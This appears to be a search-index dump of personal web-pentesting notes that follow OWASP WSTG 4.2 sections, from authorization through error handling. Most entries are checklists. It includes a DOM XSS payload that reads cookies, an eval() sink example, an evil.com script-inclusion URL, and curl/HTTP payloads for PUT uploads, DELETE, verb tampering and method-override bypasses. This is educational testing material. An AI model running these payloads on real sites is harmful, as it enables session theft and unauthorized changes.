                            See my notes on Local File Inclusion

                            See my notes on Remote File Inclusion

                            ","tags":["web pentesting","WSTG-ATHZ-01"]},{"location":"OWASP/WSTG-ATHZ-02/","title":"Testing for Bypassing Authorization Schema","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.2. Testing for Bypassing Authorization Schema

                            ID Link to Hackinglife Link to OWASP Description 5.2 WSTG-ATHZ-02 Testing for Bypassing Authorization Schema - Assess if horizontal or vertical access is possible. - Access to Administrative functions by force browsing (/admin/addUser)","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-02/#see-my-notes","title":"See my notes","text":"
                            • Broken access control: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
                            ","tags":["web pentesting","WSTG-ATHZ-02"]},{"location":"OWASP/WSTG-ATHZ-03/","title":"Testing for Privilege Escalation","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.3. Testing for Privilege Escalation

                            ID Link to Hackinglife Link to OWASP Description 5.3 WSTG-ATHZ-03 Testing for Privilege Escalation - Identify injection points related to role/privilege manipulation. For example: Change some param groupid=2 to groupid=1 - Verify that it is not possible for a user to modify their privileges or roles inside the application - Fuzz or otherwise attempt to bypass security measures.","tags":["web pentesting","WSTG-ATHZ-03"]},{"location":"OWASP/WSTG-ATHZ-04/","title":"Testing for Insecure Direct Object References","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.4. Testing for Insecure Direct Object References

                            ID Link to Hackinglife Link to OWASP Description 5.4 WSTG-ATHZ-04 Testing for Insecure Direct Object References - Identify points where object references may occur. - Assess the access control measures and if they're vulnerable to IDOR. For example: Force changing parameter value (?invoice=123 -> ?invoice=456)","tags":["web pentesting","WSTG-ATHZ-04"]},{"location":"OWASP/WSTG-ATHZ-05/","title":"Testing for OAuth Weaknesses","text":"

                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.5. Testing for OAuth Weaknesses

                            ID Link to Hackinglife Link to OWASP Description 5.5 WSTG-ATHZ-05 Testing for OAuth Weaknesses - Determine if OAuth2 implementation is vulnerable or using a deprecated or custom implementation.","tags":["web pentesting","WSTG-ATHZ-05"]},{"location":"OWASP/WSTG-BUSL-01/","title":"Test Business Logic Data Validation","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.1. Test Business Logic Data Validation

                            ID Link to Hackinglife Link to OWASP Description 10.1 WSTG-BUSL-01 Test Business Logic Data Validation - Identify data injection points. - Validate that all checks are occurring on the back end and can't be bypassed. - Attempt to break the format of the expected data and analyze how the application is handling it.","tags":["web pentesting","WSTG-BUSL-01"]},{"location":"OWASP/WSTG-BUSL-02/","title":"Test Ability to Forge Requests","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.2. Test Ability to Forge Requests

                            ID Link to Hackinglife Link to OWASP Description 10.2 WSTG-BUSL-02 Test Ability to Forge Requests - Review the project documentation looking for guessable, predictable, or hidden functionality of fields. - Insert logically valid data in order to bypass normal business logic workflow.","tags":["web pentesting","WSTG-BUSL-02"]},{"location":"OWASP/WSTG-BUSL-03/","title":"Test Integrity Checks","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.3. Test Integrity Checks

                            ID Link to Hackinglife Link to OWASP Description 10.3 WSTG-BUSL-03 Test Integrity Checks - Review the project documentation for components of the system that move, store, or handle data. - Determine what type of data is logically acceptable by the component and what types the system should guard against. - Determine who should be allowed to modify or read that data in each component. - Attempt to insert, update, or delete data values used by each component that should not be allowed per the business logic workflow.","tags":["web pentesting","WSTG-BUSL-03"]},{"location":"OWASP/WSTG-BUSL-04/","title":"Test for Process Timing","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.4. Test for Process Timing

                             ID Link to Hackinglife Link to OWASP Description 10.4 WSTG-BUSL-04 Test for Process Timing - Review the project documentation for system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time. - Develop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing (Race Condition).","tags":["web pentesting","WSTG-BUSL-04"]},{"location":"OWASP/WSTG-BUSL-05/","title":"Test Number of Times a Function Can Be Used Limits","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.5. Test Number of Times a Function Can Be Used Limits

                            ID Link to Hackinglife Link to OWASP Description 10.5 WSTG-BUSL-05 Test Number of Times a Function Can Be Used Limits - Identify functions that must set limits to the times they can be called. - Assess if there is a logical limit set on the functions and if it is properly validated. - For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.","tags":["web pentesting","WSTG-BUSL-05"]},{"location":"OWASP/WSTG-BUSL-06/","title":"Testing for the Circumvention of Work Flows","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.6. Testing for the Circumvention of Work Flows

                            ID Link to Hackinglife Link to OWASP Description 10.6 WSTG-BUSL-06 Testing for the Circumvention of Work Flows - Review the project documentation for methods to skip or go through steps in the application process in a different order from the intended business logic flow. - Develop a misuse case and try to circumvent every logic flow identified.","tags":["web pentesting","WSTG-BUSL-06"]},{"location":"OWASP/WSTG-BUSL-07/","title":"Test Defenses Against Application Misuse","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.7. Test Defenses Against Application Misuse

                            ID Link to Hackinglife Link to OWASP Description 10.7 WSTG-BUSL-07 Test Defenses Against Application Misuse - Generate notes from all tests conducted against the system. - Review which tests had a different functionality based on aggressive input. - Understand the defenses in place and verify if they are enough to protect the system against bypassing techniques. - Measures that might indicate the application has in-built self-defense: \u2022 Changed responses \u2022 Blocked requests \u2022 Actions that log a user out or lock their account","tags":["web pentesting","WSTG-BUSL-07"]},{"location":"OWASP/WSTG-BUSL-08/","title":"Test Upload of Unexpected File Types","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.8. Test Upload of Unexpected File Types

                             ID Link to Hackinglife Link to OWASP Description 10.8 WSTG-BUSL-08 Test Upload of Unexpected File Types - Review the project documentation for file types that are rejected by the system. - Verify that the unwelcome file types are rejected and handled safely. Also, check whether the website only checks for \"Content-type\" or file extension. - Verify that file batch uploads are secure and do not allow any bypass against the set security measures.","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-08/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

                            See my notes on Arbitrary File Upload

                            ","tags":["web pentesting","WSTG-BUSL-08"]},{"location":"OWASP/WSTG-BUSL-09/","title":"Test Upload of Malicious Files","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.9. Test Upload of Malicious Files

                            ID Link to Hackinglife Link to OWASP Description 10.9 WSTG-BUSL-09 Test Upload of Malicious Files - Identify the file upload functionality. - Review the project documentation to identify what file types are considered acceptable, and what types would be considered dangerous or malicious. - If documentation is not available then consider what would be appropriate based on the purpose of the application. - Determine how the uploaded files are processed. - Obtain or create a set of malicious files for testing. - Try to upload the malicious files to the application and determine whether it is accepted and processed.","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-09/#see-my-notes-on-arbitrary-file-upload","title":"See my notes on Arbitrary File Upload","text":"

                            See my notes on Arbitrary File Upload

                            ","tags":["web pentesting","WSTG-BUSL-09"]},{"location":"OWASP/WSTG-BUSL-10/","title":"Test Payment Functionality","text":"

                            OWASP Web Security Testing Guide 4.2 > 10. Business logic Testing > 10.10. Test Payment Functionality

                            ID Link to Hackinglife Link to OWASP Description 10.10 WSTG-BUSL-10 Test Payment Functionality - Determine whether the business logic for the e-commerce functionality is robust. - Understand how the payment functionality works. - Determine whether the payment functionality is secure.","tags":["web pentesting","WSTG-BUSL-10"]},{"location":"OWASP/WSTG-CLNT-01/","title":"Testing for DOM-Based Cross Site Scripting","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.1. Testing for DOM-Based Cross Site Scripting

                            ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                             The key to exploiting this XSS flaw is that the client-side script code can access the browser's DOM, and thus all the information available in it. Examples of this information are the URL, history, cookies, and local storage. Technically, there are two keywords: sources and sinks. Let's use the following vulnerable code:

                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#causes","title":"Causes","text":"

                             The following vulnerable code in a welcome page may lead to a DOM XSS attack when visiting a URL such as: http://example.com/#w!Giuseppe

                             <h1 id='welcome'></h1>\n<script>\n    // Source: the URL fragment, controlled by whoever crafts the link\n    var w = \"Welcome \";\n    var name = document.location.hash.substring(\n                document.location.hash.search(/#w!/i) + 3,\n                document.location.hash.length\n                );\n    // Sink: untrusted input written into the DOM without sanitization\n    document.getElementById('welcome').innerHTML = w + name;\n</script>\n

                            location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

                            To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.
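
                             For instance, with the vulnerable welcome page above, anything placed after #w! in the fragment reaches the innerHTML sink. A payload along these lines (URL purely illustrative) executes attacker-controlled JavaScript, because innerHTML does not run injected <script> tags but does fire event handlers on injected elements:

                             http://example.com/#w!<img src=x onerror=alert(document.cookie)>\n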

                            What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.
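
                             As a minimal sketch (hypothetical snippet, not taken from the welcome page above), an eval() sink reachable from the query string shows why such functions are dangerous:

                             // DANGEROUS sink: executes whatever follows \"?\" in the URL\nvar qs = document.location.search.substring(1);\neval(qs); // e.g. http://example.com/page?alert(document.domain)\n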

                            Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

                            Which sinks can lead to DOM-XSS vulnerabilities:

                            • document.write()
                            • document.writeln()
                             • location.replace()
                            • document.domain
                            • element.innerHTML
                            • element.outerHTML
                            • element.insertAdjacentHTML
                            • element.onevent

                             The DOMXSS Wiki project aims to identify source and sink methods exposed by public, widely used JavaScript frameworks.

                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-01/#attack-techniques","title":"Attack techniques","text":"

                            Go to my XSS cheat sheet

                            ","tags":["web pentesting","WSTG-CLNT-01"]},{"location":"OWASP/WSTG-CLNT-02/","title":"Testing for JavaScript Execution","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.2. Testing for JavaScript Execution

                            ID Link to Hackinglife Link to OWASP Description 11.2 WSTG-CLNT-02 Testing for JavaScript Execution - Identify sinks and possible JavaScript injection points.","tags":["web pentesting","WSTG-CLNT-02"]},{"location":"OWASP/WSTG-CLNT-03/","title":"Testing for HTML Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.3. Testing for HTML Injection

                            ID Link to Hackinglife Link to OWASP Description 11.3 WSTG-CLNT-03 Testing for HTML Injection - Identify HTML injection points and assess the severity of the injected content. For example: page.html?user=","tags":["web pentesting","WSTG-CLNT-03"]},{"location":"OWASP/WSTG-CLNT-04/","title":"Testing for Client-side URL Redirect","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.4. Testing for Client-side URL Redirect

                            ID Link to Hackinglife Link to OWASP Description 11.4 WSTG-CLNT-04 Testing for Client-side URL Redirect - Identify injection points that handle URLs or paths. - Assess the locations that the system could redirect to (Open Redirect). For example: ?redirect=www.fake-target.site","tags":["web pentesting","WSTG-CLNT-04"]},{"location":"OWASP/WSTG-CLNT-05/","title":"Testing for CSS Injection","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.5. Testing for CSS Injection

                            ID Link to Hackinglife Link to OWASP Description 11.5 WSTG-CLNT-05 Testing for CSS Injection - Identify CSS injection points. - Assess the impact of the injection.","tags":["web pentesting","WSTG-CLNT-05"]},{"location":"OWASP/WSTG-CLNT-06/","title":"Testing for Client-side Resource Manipulation","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.6. Testing for Client-side Resource Manipulation

                            ID Link to Hackinglife Link to OWASP Description 11.6 WSTG-CLNT-06 Testing for Client-side Resource Manipulation - Identify sinks with weak input validation. - Assess the impact of the resource manipulation. For example: www.victim.com/#http://evil.com/js.js","tags":["web pentesting","WSTG-CLNT-06"]},{"location":"OWASP/WSTG-CLNT-07/","title":"Testing Cross Origin Resource Sharing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.7. Testing Cross Origin Resource Sharing

                            ID Link to Hackinglife Link to OWASP Description 11.7 WSTG-CLNT-07 Testing Cross Origin Resource Sharing - Identify endpoints that implement CORS. - Ensure that the CORS configuration is secure or harmless.","tags":["web pentesting","WSTG-CLNT-07"]},{"location":"OWASP/WSTG-CLNT-08/","title":"Testing for Cross Site Flashing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.8. Testing for Cross Site Flashing

                             ID Link to Hackinglife Link to OWASP Description 11.8 WSTG-CLNT-08 Testing for Cross Site Flashing - Decompile and analyze the application's code. - Assess sink inputs and unsafe method usages. For example: file.swf?lang=http://evil","tags":["web pentesting","WSTG-CLNT-08"]},{"location":"OWASP/WSTG-CLNT-09/","title":"Testing for Clickjacking","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.9. Testing for Clickjacking

                             ID Link to Hackinglife Link to OWASP Description 11.9 WSTG-CLNT-09 Testing for Clickjacking - Understand security measures in place. - Discover if a website is vulnerable by loading it into an iframe: create a simple web page that includes a frame containing the target. - Assess how strict the security measures are and if they are bypassable.","tags":["web pentesting","WSTG-CLNT-09"]},{"location":"OWASP/WSTG-CLNT-10/","title":"Testing WebSockets","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.10. Testing WebSockets

                            ID Link to Hackinglife Link to OWASP Description 11.10 WSTG-CLNT-10 Testing WebSockets - Identify the usage of WebSockets by inspecting ws:// or wss:// URI scheme. - Assess its implementation by using the same tests on normal HTTP channels.","tags":["web pentesting","WSTG-CLNT-10"]},{"location":"OWASP/WSTG-CLNT-11/","title":"Testing Web Messaging","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.11. Testing Web Messaging

                             ID Link to Hackinglife Link to OWASP Description 11.11 WSTG-CLNT-11 Testing Web Messaging - Assess the security of the message's origin. - Validate that it uses safe methods and validates its input.","tags":["web pentesting","WSTG-CLNT-11"]},{"location":"OWASP/WSTG-CLNT-12/","title":"Testing Browser Storage","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.12. Testing Browser Storage

                            ID Link to Hackinglife Link to OWASP Description 11.12 WSTG-CLNT-12 Testing Browser Storage - Determine whether the website is storing sensitive data in client-side storage. - The code handling of the storage objects should be examined for possibilities of injection attacks, such as utilizing unvalidated input or vulnerable libraries.","tags":["web pentesting","WSTG-CLNT-12"]},{"location":"OWASP/WSTG-CLNT-13/","title":"Testing for Cross Site Script Inclusion","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.13. Testing for Cross Site Script Inclusion

                            ID Link to Hackinglife Link to OWASP Description 11.13 WSTG-CLNT-13 Testing for Cross Site Script Inclusion - Locate sensitive data across the system. - Assess the leakage of sensitive data through various techniques.","tags":["web pentesting","WSTG-CLNT-13"]},{"location":"OWASP/WSTG-CLNT-14/","title":"Testing for Reverse Tabnabbing","text":"

                            OWASP Web Security Testing Guide 4.2 > 11. Client Side Testing > 11.14. Testing for Reverse Tabnabbing

                            ID Link to Hackinglife Link to OWASP Description 11.14 WSTG-CLNT-14 Testing for Reverse Tabnabbing N/A","tags":["web pentesting","WSTG-CLNT-14"]},{"location":"OWASP/WSTG-CONF-01/","title":"Test Network Infrastructure Configuration","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.1. Test Network Infrastructure Configuration

                            ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.","tags":["web pentesting","reconnaissance","WSTG-CONF-01","dorkings"]},{"location":"OWASP/WSTG-CONF-02/","title":"Test Application Platform Configuration","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.2. Test Application Platform Configuration

                             ID Link to Hackinglife Link to OWASP Description 2.2 WSTG-CONF-02 Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40x, 50x) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage, Log Rotation, Log Access Control, Log Review","tags":["web pentesting","reconnaissance","WSTG-CONF-02"]},{"location":"OWASP/WSTG-CONF-03/","title":"Test File Extensions Handling for Sensitive Information","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.3. Test File Extensions Handling for Sensitive Information

                             ID Link to Hackinglife Link to OWASP Description 2.3 WSTG-CONF-03 Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important files and information (.asa, .inc, .sql, .zip, .tar, .pdf, .txt, etc.) - Validate that no system framework bypasses exist on the rules set.","tags":["web pentesting","reconnaissance","WSTG-CONF-03"]},{"location":"OWASP/WSTG-CONF-04/","title":"Review Old Backup and Unreferenced Files for Sensitive Information","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.4. Review Old Backup and Unreferenced Files for Sensitive Information

                            ID Link to Hackinglife Link to OWASP Description 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename","tags":["web pentesting","reconnaissance","WSTG-CONF-04"]},{"location":"OWASP/WSTG-CONF-05/","title":"Enumerate Infrastructure and Application Admin Interfaces","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.5. Enumerate Infrastructure and Application Admin Interfaces

                            ID Link to Hackinglife Link to OWASP Description 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)","tags":["web pentesting","reconnaissance","WSTG-CONF-05"]},{"location":"OWASP/WSTG-CONF-06/","title":"Test HTTP Methods","text":"

                             OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing > 2.6. Test HTTP Methods

                            ID Link to Hackinglife Link to OWASP Description 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques.

                            HTTP method tampering, also known as HTTP verb tampering, is a type of security vulnerability that can be exploited in web applications. HTTP method tampering occurs when an attacker modifies the HTTP method being used in a request to trick the web application into performing unintended actions.

                            More about HTTP methods.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#test-objectives","title":"Test Objectives","text":"
                            • Enumerate supported HTTP methods.
                            • Test for access control bypass.
                            • Test HTTP method overriding techniques.

                            Enumerate with OPTIONS:

                            curl -v -X OPTIONS <target>\n

                            Test access control bypass with a made-up method:

                            curl -v -X FAKEMETHOD <target>\n

                            Or test access control bypass with other methods.

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#put","title":"PUT","text":"

                            After enumerating methods with Burpsuite:

                            OPTIONS /uploads HTTP/1.1\nHost: example.org\n

We obtained the following response:

                            HTTP/1.1 200 OK\nDate: ....\n....\nAllow: OPTIONS,GET,HEAD,POST,PUT,DELETE,TRACE,PROPPATCH,COPY,MOVE,LOCK\n

                            Then, we can try to upload a file by using Burpsuite. Typical payload:

                            PUT /test.html HTTP/1.1\nHost: example.org\nContent-Length: 25\n\n<script>alert(1)</script>\n

                            Try to upload a file by using curl. Typical payload:

                            curl https://example.org --upload-file test.html\ncurl -X PUT https://example.org/test.html -d \"<script>alert(1)</script>\"\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#delete","title":"DELETE","text":"

                            Try to delete a file by using Burpsuite. Typical payload:

                            DELETE /uploads/file1.pdf HTTP/1.1\nHost: example.org\n

                            Try to delete a file by using curl. Typical payload:

                            curl -X DELETE https://example.org/uploads/file1.pdf\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#trace","title":"TRACE","text":"

The\u00a0TRACE\u00a0method (or Microsoft\u2019s equivalent\u00a0TRACK\u00a0method) causes the server to echo back the contents of the request. This led to a vulnerability called Cross-Site Tracing (XST), which could be used to access cookies that had the\u00a0HttpOnly\u00a0flag set. The\u00a0TRACE\u00a0method has been blocked in all browsers and plugins for many years; as such, this issue is no longer exploitable. However, it may still be flagged by automated scanning tools, and the\u00a0TRACE\u00a0method being enabled on a web server suggests that it has not been properly hardened.
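
Although browsers have long blocked TRACE, the method can still be probed directly from the command line; a minimal sketch with curl (example.org is a placeholder):

curl -v -X TRACE https://example.org/\n# If TRACE is enabled, the response body echoes the request back, including its headers\n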

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#connect","title":"CONNECT","text":"

                            The\u00a0CONNECT\u00a0method causes the web server to open a TCP connection to another system, and then pass traffic from the client to that system. This could allow an attacker to proxy traffic through the server, in order to hide their source address, access internal systems or access services that are bound to localhost. An example of a\u00a0CONNECT\u00a0request is shown below:

                            CONNECT 192.168.0.1:443 HTTP/1.1\nHost: example.org\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-access-control-bypass","title":"Testing for Access Control Bypass","text":"

                            If a page on the application redirects users to a login page with a 302 code when they attempt to access it directly, it may be possible to bypass this by making a request with a different HTTP method, such as\u00a0HEAD,\u00a0POST\u00a0or even a made up method such as\u00a0FOO. If the web application responds with a\u00a0HTTP/1.1 200 OK\u00a0rather than the expected\u00a0HTTP/1.1 302 Found, it may then be possible to bypass the authentication or authorization.

                            HEAD /admin/ HTTP/1.1\nHost: example.org\n
                            HTTP/1.1 200 OK\n[...]\nSet-Cookie: adminSessionCookie=[...];\n
                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-06/#testing-for-http-method-overriding","title":"Testing for HTTP Method Overriding","text":"

                            Some web frameworks provide a way to override the actual HTTP method in the request. They achieve this by emulating the missing HTTP verbs and passing some custom headers in the requests. For example:

                            • X-HTTP-Method
                            • X-HTTP-Method-Override
                            • X-Method-Override

                            To test this, consider scenarios where restricted verbs like\u00a0PUT\u00a0or\u00a0DELETE\u00a0return a\u00a0405 Method not allowed. In such cases, replay the same request, but add the alternative headers for HTTP method overriding.
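
A minimal sketch of such a replay with curl (the endpoint is illustrative; try each of the headers above in turn):

# Direct request is rejected with 405\ncurl -i -X DELETE https://example.org/api/v1/users/1\n# Replay as POST, smuggling the verb through an override header\ncurl -i -X POST https://example.org/api/v1/users/1 -H \"X-HTTP-Method-Override: DELETE\"\n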

                            ","tags":["web pentesting","reconnaissance","WSTG-CONF-06"]},{"location":"OWASP/WSTG-CONF-07/","title":"Test HTTP Strict Transport Security","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.7. Test HTTP Strict Transport Security

                            ID Link to Hackinglife Link to OWASP Description 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ |","tags":["web pentesting","reconnaissance","WSTG-CONF-07"]},{"location":"OWASP/WSTG-CONF-08/","title":"Test RIA Cross Domain Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.8. Test RIA Cross Domain Policy

                            ID Link to Hackinglife Link to OWASP Description 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.","tags":["web pentesting","reconnaissance","WSTG-CONF-08"]},{"location":"OWASP/WSTG-CONF-09/","title":"Test File Permission","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.9. Test File Permission

                            ID Link to Hackinglife Link to OWASP Description 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default.","tags":["web pentesting","reconnaissance","WSTG-CONF-09"]},{"location":"OWASP/WSTG-CONF-10/","title":"Test for Subdomain Takeover","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.10. Test for Subdomain Takeover

                            ID Link to Hackinglife Link to OWASP Description 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains.","tags":["web pentesting","reconnaissance","WSTG-CONF-10"]},{"location":"OWASP/WSTG-CONF-11/","title":"Test Cloud Storage","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.11. Test Cloud Storage

                            ID Link to Hackinglife Link to OWASP Description 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place.","tags":["web pentesting","reconnaissance","WSTG-CONF-11"]},{"location":"OWASP/WSTG-CONF-12/","title":"Testing for Content Security Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.12. Testing for Content Security Policy

                            ID Link to Hackinglife Link to OWASP Description 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations.","tags":["web pentesting","reconnaissance","WSTG-CONF-12"]},{"location":"OWASP/WSTG-CONF-13/","title":"Test Path Confusion","text":"

                            OWASP Web Security Testing Guide 4.2 > 2. Configuration and Deploy Management Testing> 2.13. Test Path Confusion

                            ID Link to Hackinglife Link to OWASP Description 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["web pentesting","reconnaissance","WSTG-CONF-13"]},{"location":"OWASP/WSTG-CRYP-01/","title":"Testing for Weak Transport Layer Security","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.1. Testing for Weak Transport Layer Security

ID Link to Hackinglife Link to OWASP Description 9.1 WSTG-CRYP-01 Testing for Weak Transport Layer Security - Validate the server configuration (identify weak ciphers/protocols, i.e. RC4, BEAST, CRIME, POODLE). - Review the digital certificate's cryptographic strength and validity. - Ensure that the TLS security is not bypassable and is properly implemented across the application.","tags":["web pentesting","WSTG-CRYP-01"]},{"location":"OWASP/WSTG-CRYP-02/","title":"Testing for Padding Oracle","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.2. Testing for Padding Oracle

                            ID Link to Hackinglife Link to OWASP Description 9.2 WSTG-CRYP-02 Testing for Padding Oracle - Identify encrypted messages that rely on padding. - Attempt to break the padding of the encrypted messages and analyze the returned error messages for further analysis.","tags":["web pentesting","WSTG-CRYP-02"]},{"location":"OWASP/WSTG-CRYP-03/","title":"Testing for Sensitive Information Sent via Unencrypted Channels","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.3. Testing for Sensitive Information Sent via Unencrypted Channels

                            ID Link to Hackinglife Link to OWASP Description 9.3 WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels - Identify sensitive information transmitted through the various channels. - Assess the privacy and security of the channels used. - Check sensitive data during the transmission: \u2022 Information used in authentication (e.g. Credentials, PINs, Session, identifiers, Tokens, Cookies\u2026), \u2022 Information protected by laws, regulations or specific organizational, policy (e.g. Credit Cards, Customers data)","tags":["web pentesting","WSTG-CRYP-03"]},{"location":"OWASP/WSTG-CRYP-04/","title":"Testing for Weak Encryption","text":"

                            OWASP Web Security Testing Guide 4.2 > 9. Cryptography > 9.4. Testing for Weak Encryption

                            ID Link to Hackinglife Link to OWASP Description 9.4 WSTG-CRYP-04 Testing for Weak Encryption - Provide a guideline for the identification weak encryption or hashing uses and implementations.","tags":["web pentesting","WSTG-CRYP-04"]},{"location":"OWASP/WSTG-ERRH-01/","title":"Testing for Improper Error Handling","text":"

OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.1. Testing for Improper Error Handling

ID Link to Hackinglife Link to OWASP Description 8.1 WSTG-ERRH-01 Testing for Improper Error Handling - Identify existing error output (e.g. random files/folders returning 40x errors). - Analyze the different output returned.","tags":["web pentesting","WSTG-ERRH-01"]},{"location":"OWASP/WSTG-ERRH-02/","title":"Testing for Stack Traces","text":"

                            OWASP Web Security Testing Guide 4.2 > 8. Error Handling > 8.2. Testing for Stack Traces

